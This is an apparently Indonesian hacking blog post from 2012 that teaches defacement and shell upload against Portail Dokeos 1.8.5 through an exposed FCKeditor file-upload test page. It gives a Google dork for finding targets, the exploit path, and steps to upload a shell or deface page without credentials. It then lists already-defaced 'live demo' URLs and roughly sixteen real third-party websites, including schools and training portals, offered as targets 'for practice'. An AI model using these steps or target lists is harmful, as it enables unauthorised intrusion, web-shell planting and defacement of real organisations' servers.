Senin, 27 Agustus 2012

"Portail Dokeos" deface and Shell Upload vulnerability


Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password


image_2315846.original.jpg (350×350)

Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here 


Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.blowupwebshow.com/staff/main/upload/backlinks.html
http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.rottapro.net/main/upload/backlinks.html


Other websites For practice



http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Tidak ada komentar:

Posting Komentar